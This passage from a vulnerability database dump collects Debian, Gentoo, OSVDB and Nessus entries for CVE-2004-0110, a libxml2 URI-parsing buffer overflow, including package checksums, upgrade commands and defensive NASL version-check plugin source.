configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/libx/libxml/libxml_1.8.17-2woody1.dsc\n Size/MD5 checksum: 651 16512f774479d73b7d82ca4e1db527f5\n http://security.debian.org/pool/updates/main/libx/libxml/libxml_1.8.17-2woody1.diff.gz\n Size/MD5 checksum: 33976 68afef27edf44d2b81e02fde3431bca8\n http://security.debian.org/pool/updates/main/libx/libxml/libxml_1.8.17.orig.tar.gz\n Size/MD5 checksum: 1016403 b8f01e43e1e03dec37dfd6b4507a9568\n\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1.dsc\n Size/MD5 checksum: 654 6f56380f9bfade2c66f03956e1a65162\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1.diff.gz\n Size/MD5 checksum: 344358 ba3ea49cc8c465ff1a6377780c35a45d\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19.orig.tar.gz\n Size/MD5 checksum: 1925487 22e3c043f57e18baaed86c5fff3eafbc\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_alpha.deb\n Size/MD5 checksum: 381994 dc3ada5391f52bdfd642df1bc5b9a6be\n http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_alpha.deb\n Size/MD5 checksum: 208830 a0698c267c722bf5127ee3709024ecc9\n\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_alpha.deb\n Size/MD5 checksum: 388786 a4ece19b65c46dd0e8f889c26e5938b3\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_alpha.deb\n Size/MD5 checksum: 938568 5f3e46bd132c9167db9e93ca3c739952\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_arm.deb\n Size/MD5 checksum: 392536 9e126158928d24a562ae1d2b3d35ae1d\n http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_arm.deb\n Size/MD5 checksum: 184172 0527fd6a14e003139be9b475e689ee41\n\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_arm.deb\n Size/MD5 checksum: 346060 6b9caeac9a0061576f8a1e5b46ed8671\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_arm.deb\n Size/MD5 checksum: 902966 688fb8c5ea18b0f9d8e7671dad5426c5\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_i386.deb\n Size/MD5 checksum: 330042 b1c61849e10edbe597429fcd05d1d2b3\n http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_i386.deb\n Size/MD5 checksum: 183310 3c217f980c138f24eac1a0abd89eba78\n\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_i386.deb\n Size/MD5 checksum: 333034 11cfc7169e549c63dccf28f15300a8eb\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_i386.deb\n Size/MD5 checksum: 843084 43a242f53ed8a688e5ed02284a150f52\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_ia64.deb\n Size/MD5 checksum: 447184 5bfa2835a9d9b43da6d31e1cadce6bc1\n http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_ia64.deb\n Size/MD5 checksum: 285484 a378583eaaaf1248aba8de4fd721c5fc\n\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_ia64.deb\n Size/MD5 checksum: 507452 b447844080f6e0c1d498b34ec849c9b2\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_ia64.deb\n Size/MD5 checksum: 1032662 ddd7aae0835fe1edb04aee7cdf2e41c0\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_hppa.deb\n Size/MD5 checksum: 439372 d5f629dc7f885dd858671ab639d954f8\n http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_hppa.deb\n Size/MD5 checksum: 248212 837ec145aac757ce053075a4736ddb55\n\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_hppa.deb\n Size/MD5 checksum: 425454 0719d6e0835b6dae714b1ce1a0bd9d77\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_hppa.deb\n Size/MD5 checksum: 979152 41e110f4c9805a5afb94fff79d1f3d22\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_m68k.deb\n Size/MD5 checksum: 318176 d0dcb654f8083e0873396d38aaa1a7a2\n http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_m68k.deb\n Size/MD5 checksum: 178226 c18c0c7bb3c0884c62f36922e5843e83\n\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_m68k.deb\n Size/MD5 checksum: 336902 2990a52db32dc3fd3108be4e677e59bf\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_m68k.deb\n Size/MD5 checksum: 828820 6378b37494b667bce472f934f50c3cb8\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_mips.deb\n Size/MD5 checksum: 376266 1c226409e23047ec521224697a82f76c\n http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_mips.deb\n Size/MD5 checksum: 183628 0fa6098bdbfeadb50dfb7e5f4f2c967c\n\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_mips.deb\n Size/MD5 checksum: 348902 474e9b8bc026ca199218727203422c12\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_mips.deb\n Size/MD5 checksum: 921098 b8aa537054fc482ab042647ac0551f94\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_mipsel.deb\n Size/MD5 checksum: 373696 603708cf407ea49748c987bea0ddaade\n http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_mipsel.deb\n Size/MD5 checksum: 182958 5397950eb709142774a2aa70f5faa9db\n\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_mipsel.deb\n Size/MD5 checksum: 343660 985465f428571c774bb3b44699768c15\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_mipsel.deb\n Size/MD5 checksum: 915010 0553eb273d500c82b93cac55b7c52ad4\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_powerpc.deb\n Size/MD5 checksum: 356590 f97bc218912092bae051188dd9c157d5\n http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_powerpc.deb\n Size/MD5 checksum: 194062 b37b9d75744323dafdc4a76293c3456d\n\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_powerpc.deb\n Size/MD5 checksum: 376486 bdfb8d5a839f65286e57e34857fd14f1\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_powerpc.deb\n Size/MD5 checksum: 916952 90f7f069508d26431cc61f967886b159\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_s390.deb\n Size/MD5 checksum: 329398 2b6046a2aeb468a00abc8556676d10d1\n http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_s390.deb\n Size/MD5 checksum: 184216 78803336930258db2d7b115c4b708fad\n\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_s390.deb\n Size/MD5 checksum: 360282 a7bb4f832d6a4d86753b3d046f4e8fa1\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_s390.deb\n Size/MD5 checksum: 857396 e7efd1f4a92ba1f6a1a3c96e5c5a851b\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_sparc.deb\n Size/MD5 checksum: 347058 88ec785a5184e9ff44e617638b661be4\n http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_sparc.deb\n Size/MD5 checksum: 196108 da3f13d8c4e4ffd8604cd01cf26c781f\n\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_sparc.deb\n Size/MD5 checksum: 363670 ab415cd91562622e7ab2dde1df98a09b\n http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_sparc.deb\n Size/MD5 checksum: 886976 ba693e42209a963c26f325d89ecbe989\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2004-03-04T00:00:00", "published": "2004-03-04T00:00:00", "id": "DEBIAN:DSA-455-1:D91F9", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00052.html", "title": "[SECURITY] [DSA 455-1] New libxml packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:32", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0110"], "edition": 1, "description": "### Background\n\n### Description\n\nYuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6. When the libxml2 library fetches a remote resource via FTP or HTTP, libxml2 uses parsing routines that can overflow a buffer caused by improper bounds checking if they are passed a URL longer than 4096 bytes. \n\n### Impact\n\nIf an attacker is able to exploit an application using libxml2 that parses remote resources, then this flaw could be used to execute arbitrary code. \n\n### Workaround\n\nNo workaround is available; users are urged to upgrade libxml2 to 2.6.6. \n\n### Resolution\n\nAll users are recommended to upgrade their libxml2 installation: \n \n \n # emerge sync\n # emerge -pv \">=dev-libs/libxml2-2.6.6\"\n # emerge \">=dev-libs/libxml2-2.6.6\"", "modified": "2004-03-05T00:00:00", "published": "2004-03-05T00:00:00", "id": "GLSA-200403-01", "href": "https://security.gentoo.org/glsa/200403-01", "type": "gentoo", "title": "Libxml2 URI Parsing Buffer Overflow Vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:58", "bulletinFamily": "software", "cvelist": ["CVE-2004-0110"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Libxml2. The nanoftp daemon fails to perform proper bounds checking, resulting in a buffer overflow. With a specially crafted overly-long request URI, reportedly about 4096 bytes, an attacker can potentially execute arbitrary code resulting in a loss of possible unauthorized remote access.\n## Solution Description\nUpgrade to version 2.6.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in Libxml2. The nanoftp daemon fails to perform proper bounds checking, resulting in a buffer overflow. With a specially crafted overly-long request URI, reportedly about 4096 bytes, an attacker can potentially execute arbitrary code resulting in a loss of possible unauthorized remote access.\n## References:\nVendor Specific Solution URL: http://www.xmlsoft.org/downloads.html\n[Vendor Specific Advisory URL](http://www.novell.com/linux/security/advisories/2005_01_sr.html)\n[Secunia Advisory ID:10958](https://secuniaresearch.flexerasoftware.com/advisories/10958/)\n[Secunia Advisory ID:13506](https://secuniaresearch.flexerasoftware.com/advisories/13506/)\nRedHat RHSA: RHSA-2004:650\nRedHat RHSA: RHSA-2004:090\nRedHat RHSA: RHSA-2004:091\nOther Advisory URL: http://www.kb.cert.org/vuls/id/493966\n[Nessus Plugin ID:14118](https://vulners.com/search?query=pluginID:14118)\n[Nessus Plugin ID:12627](https://vulners.com/search?query=pluginID:12627)\n[Nessus Plugin ID:12474](https://vulners.com/search?query=pluginID:12474)\n[Nessus Plugin ID:14452](https://vulners.com/search?query=pluginID:14452)\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=107851606605420&w=2\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=107860178228804&w=2\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=107876755716569&w=2\nKeyword: XMLSoft,Libxml2,nanoftp,URI parsing,bounds check,overflow\nISS X-Force ID: 15302\n[CVE-2004-0110](https://vulners.com/cve/CVE-2004-0110)\nBugtraq ID: 9718\n", "modified": "2004-02-12T00:00:00", "published": "2004-02-12T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:4033", "id": "OSVDB:4033", "type": "osvdb", "title": "libxml2 nanoftp URI Parsing Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:58", "bulletinFamily": "software", "cvelist": ["CVE-2004-0110"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Libxml2. The nanohttp daemon fails to perform proper bounds checking, resulting in a buffer overflow. With a specially crafted overly-long request URI, reportedly about 4096 bytes, an attacker can potentially execute arbitrary code resulting in a loss of possible unauthorized remote access.\n## Solution Description\nUpgrade to version 2.6.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in Libxml2. The nanohttp daemon fails to perform proper bounds checking, resulting in a buffer overflow. With a specially crafted overly-long request URI, reportedly about 4096 bytes, an attacker can potentially execute arbitrary code resulting in a loss of possible unauthorized remote access.\n## References:\nVendor Specific Solution URL: http://www.xmlsoft.org/downloads.html\n[Vendor Specific Advisory URL](http://www.novell.com/linux/security/advisories/2005_01_sr.html)\n[Secunia Advisory ID:10958](https://secuniaresearch.flexerasoftware.com/advisories/10958/)\n[Secunia Advisory ID:13506](https://secuniaresearch.flexerasoftware.com/advisories/13506/)\nRedHat RHSA: RHSA-2004:650\nRedHat RHSA: RHSA-2004:090\nRedHat RHSA: RHSA-2004:091\nOther Advisory URL: http://www.kb.cert.org/vuls/id/493966\n[Nessus Plugin ID:14118](https://vulners.com/search?query=pluginID:14118)\n[Nessus Plugin ID:12627](https://vulners.com/search?query=pluginID:12627)\n[Nessus Plugin ID:12474](https://vulners.com/search?query=pluginID:12474)\n[Nessus Plugin ID:14452](https://vulners.com/search?query=pluginID:14452)\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=107851606605420&w=2\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=107860178228804&w=2\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=107876755716569&w=2\nKeyword: XMLSoft,Libxml2,nanohttp,URI parsing,bounds check,overflow\nISS X-Force ID: 15301\n[CVE-2004-0110](https://vulners.com/cve/CVE-2004-0110)\nBugtraq ID: 9718\n", "modified": "2004-02-12T00:00:00", "published": "2004-02-12T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:4032", "id": "OSVDB:4032", "type": "osvdb", "title": "libxml2 nanohttp URI Parsing Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2016-09-26T17:24:14", "edition": 1, "description": "The following package needs to be updated: libxml2", "published": "2004-07-06T00:00:00", "type": "nessus", "title": "FreeBSD : libxml2 stack buffer overflow in URI parsing (208)", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0110"], "modified": "2004-07-06T00:00:00", "id": "FREEBSD_XML2_266.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=12627", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated by freebsd_pkg_847ade05671711d8b321000a95bc6fae.nasl.\n#\n# Disabled on 2011/10/02.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This script contains information extracted from VuXML :\n#\n# Copyright 2003-2006 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n#\n#\n\ninclude('compat.inc');\n\nif ( description )\n{\n script_id(12627);\n script_version(\"$Revision: 1.10 $\");\n script_cve_id(\"CVE-2004-0110\");\n\n script_name(english:\"FreeBSD : libxml2 stack buffer overflow in URI parsing (208)\");\n\nscript_set_attribute(attribute:'synopsis', value: 'The remote host is missing a security update');\nscript_set_attribute(attribute:'description', value:'The following package needs to be updated: libxml2');\nscript_set_attribute(attribute: 'cvss_vector', value: 'CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P');\nscript_set_attribute(attribute:'solution', value: 'Update the package on the remote host');\nscript_set_attribute(attribute: 'see_also', value: 'http://mail.gnome.org/archives/xml/2004-February/msg00070.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-09.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-10.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-11.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-12.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-13.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-14.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-15.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-16.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-17.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-18.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-19.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-20.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-22.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-23.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-25.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-26.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-28.html\nhttp://www.xmlsoft.org/news.html');\nscript_set_attribute(attribute:'see_also', value: 'http://www.FreeBSD.org/ports/portaudit/847ade05-6717-11d8-b321-000a95bc6fae.html');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/06\");\n script_end_attributes();\n script_summary(english:\"Check for libxml2\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"FreeBSD Local Security Checks\";\n script_family(english:family[\"english\"]);\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/FreeBSD/pkg_info\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #36421 (freebsd_pkg_847ade05671711d8b321000a95bc6fae.nasl) instead.\");\n\nglobal_var cvss_score;\ncvss_score=7;\ninclude('freebsd_package.inc');\n\n\npkg_test(pkg:\"libxml2<2.6.6\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-01-07T10:46:43", "description": "Yuuichi Teranishi reported a crash in libxml2's URI handling when a\nlong URL is supplied. The implementation in nanohttp.c and nanoftp.c\nuses a 4K stack buffer, and longer URLs will overwrite the stack. This\ncould result in denial-of-service or arbitrary code execution in\napplications using libxml2 to parse documents.", "edition": 26, "published": "2009-04-23T00:00:00", "title": "FreeBSD : libxml2 stack buffer overflow in URI parsing (847ade05-6717-11d8-b321-000a95bc6fae)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0110"], "modified": "2009-04-23T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:libxml2"], "id": "FREEBSD_PKG_847ADE05671711D8B321000A95BC6FAE.NASL", "href": "https://www.tenable.com/plugins/nessus/36421", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36421);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0110\");\n\n script_name(english:\"FreeBSD : libxml2 stack buffer overflow in URI parsing (847ade05-6717-11d8-b321-000a95bc6fae)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yuuichi Teranishi reported a crash in libxml2's URI handling when a\nlong URL is supplied. The implementation in nanohttp.c and nanoftp.c\nuses a 4K stack buffer, and longer URLs will overwrite the stack. This\ncould result in denial-of-service or arbitrary code execution in\napplications using libxml2 to parse documents.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.xmlsoft.org/news.html\"\n );\n # http://mail.gnome.org/archives/xml/2004-February/msg00070.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mail.gnome.org/archives/xml/2004-February/msg00070.html\"\n );\n # https://vuxml.freebsd.org/freebsd/847ade05-6717-11d8-b321-000a95bc6fae.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?74ae7396\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"libxml2<2.6.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:51:20", "description": "A flaw in libxml2 versions prior to 2.6.6 was found by Yuuichi\nTeranishi. When fetching a remote source via FTP or HTTP, libxml2 uses\nspecial parsing routines that can overflow a buffer if passed a very\nlong URL. In the event that the attacker can find a program that uses\nlibxml2 which parses remote resources and allows them to influence the\nURL, this flaw could be used to execute arbitrary code.\n\nThe updated packages provide a backported fix to correct the problem.", "edition": 24, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : libxml2 (MDKSA-2004:018)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0110"], "modified": "2004-07-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:libxml2-utils", "p-cpe:/a:mandriva:linux:lib64xml2-devel", "cpe:/o:mandrakesoft:mandrake_linux:9.1", "p-cpe:/a:mandriva:linux:libxml2", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:lib64xml2", "p-cpe:/a:mandriva:linux:lib64xml2-python", "p-cpe:/a:mandriva:linux:libxml2-devel", "p-cpe:/a:mandriva:linux:libxml2-python"], "id": "MANDRAKE_MDKSA-2004-018.NASL", "href": "https://www.tenable.com/plugins/nessus/14118", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:018. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14118);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0110\");\n script_xref(name:\"MDKSA\", value:\"2004:018\");\n\n script_name(english:\"Mandrake Linux Security Advisory : libxml2 (MDKSA-2004:018)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw in libxml2 versions prior to 2.6.6 was found by Yuuichi\nTeranishi. When fetching a remote source via FTP or HTTP, libxml2 uses\nspecial parsing routines that can overflow a buffer if passed a very\nlong URL. In the event that the attacker can find a program that uses\nlibxml2 which parses remote resources and allows them to influence the\nURL, this flaw could be used to execute arbitrary code.\n\nThe updated packages provide a backported fix to correct the problem.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 